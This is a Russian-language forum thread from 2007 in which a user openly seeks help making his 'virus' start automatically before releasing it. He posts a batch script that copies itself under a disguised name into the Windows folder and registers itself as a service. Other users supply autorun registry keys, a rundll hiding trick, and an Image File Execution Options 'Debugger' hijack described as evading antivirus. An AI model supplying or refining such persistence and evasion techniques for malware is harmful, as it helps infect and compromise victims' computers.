-
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
- - 2007-04-25 18:57:41.443333
|
|
|
HackMeN
Сообщений: 38
Оценки: 0
Присоединился: 2007-03-05 00:04:26.856666
|
-
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-25 19:00:41.133333
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
А при чём тут Windows?
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-25 19:32:23.280000
|
|
|
zhuk
Сообщений: 2962
Оценки: 10
Присоединился: 2007-02-20 21:00:01.303333
|
quote:
ORIGINAL: AdReNaL1Ne
А при чём тут Windows?
Наверно, виндовс причастна к автозагрузке…
Я думаю, лучше прописать в реестре. Программы, автоматически запускаемые в начале работы Windows:
Для текущего пользователя перечень автоматически запускаемых программ содержится в следующих разделах реестра:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Существует также перечень программ, автоматически запускаемых в начале работы Windows вне зависимости от пользователя системы:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
ЗЫ: Адреналин, тебя разжаловали? я думал ты модератор… В этой теме.
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-25 19:45:39.543333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
ORIGINAL: zhuk
ЗЫ: Адреналин, тебя разжаловали? я думал ты модератор… В этой теме.
Перед тем, как думать - посмотри: о чем думать!
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-25 20:40:43.883333
|
|
|
HackMeN
Сообщений: 38
Оценки: 0
Присоединился: 2007-03-05 00:04:26.856666
|
Тогда скажите как исправить скрипт.
Так прописывается.Но грузиться отказываться. Скорее я чтото пропустил.
Помогите.Поправьте.
echo Chr(39)>%temp%\1.vbs
echo Chr(39)>%temp%\2.vbs
echo on error resume next > %temp%\0.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%\0.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%\0.vbs
set a=%0
copy %a% %SystemRoot%\3apadl0.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\HackMeN" /v HackSoftware /d %SystemRoot%\3apadl0.exe /f
start %temp%\0.vbs
start %temp%\1.vbs
start %temp%\2.vbs
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 13:38:13.993333
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Чё ж так службу назвал неприметно, надо было тогда уже
HKLM\SYSTEM\CurrentControlSet\Services\YO_MAN_LOOK_HERE_I_AM_MALWARE
:D
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 15:12:00.220000
|
|
|
GROB_T
Сообщений: 349
Оценки: 0
Присоединился: 2007-01-05 02:54:27.330000
|
знакомые буковки:) а чем тебя не устроил стандартный модуль автозагрузки в кузе? там есть на вкладке дополнительно)
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 15:21:24.900000
|
|
|
zhuk
Сообщений: 2962
Оценки: 10
Присоединился: 2007-02-20 21:00:01.303333
|
Как ты себе это представляешь? Он приходит домой к жертве и говорит: "Извините, я начинающий хакер, можно я пропишу в автозагрузку свой вирус? Мне это очень нужно, вопрос чести. Пожаааааааааалуйста…" А теперь представь реакцию жертвы :D
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 15:50:24.906666
|
|
|
saimon 2metra
Сообщений: 4281
Оценки: 0
Присоединился: 2007-01-26 10:56:51.426666
|
Есть еще вариант через rundll.exe загружать. Эта служебная прога много всякой шняги на себе тянет - к примеру иконку nvidia в трэе (nwiz.exe) или модуль bluetooth (bthproops.cpl by Microsoft), там может и не заметят.
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 17:21:38.086666
|
|
|
Spider Agent
Сообщений: 794
Оценки: 0
Присоединился: 2006-10-16 12:10:08.396666
|
Сторонний софт, пропускается через всои процессы. имхо, на визуале не пропишешь, шоб вирь в чужой процесс влез. тут принадлежность его процеса необходимо к критическим отнести.
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 17:25:21.823333
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
rundll не служба.
До недавнего времени не палилось антивирями, сейчас касперский матерится
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\модуль_который_уже_в_автозагрузке
"Debugger"="малварь.ехе"
Вот это самое "модуль_который_уже_в_автозагрузке" может быть чем угодно, тот же автозагружаемый nwiz.exe или блокнот, на худой конец (taskmgr, winrar, explorer нужное подчеркнуть) А тот, кто в параметре дебагер, делает всё, что надо и передаёт управление обратно
|
|
|
|
|
RE: Надо прописать в автозагрузку , а потом релиз моего вируса... - 2007-04-26 20:03:13.740000
|
|
|
HackMeN
Сообщений: 38
Оценки: 0
Присоединился: 2007-03-05 00:04:26.856666
|
quote:
ORIGINAL: GROB_T
знакомые буковки:) а чем тебя не устроил стандартный модуль автозагрузки в кузе? там есть на вкладке дополнительно)
Да буковки оттуда , я не смог найти более наглядного примера записи в автозагрузку.
Почему не устроил а потому что там обычная загрузка, а надо как службу.
Действительно беспалевно = для примера только…
Так я не понял , как же надо прописать правильно vbs….
|
|
|
|
|
|
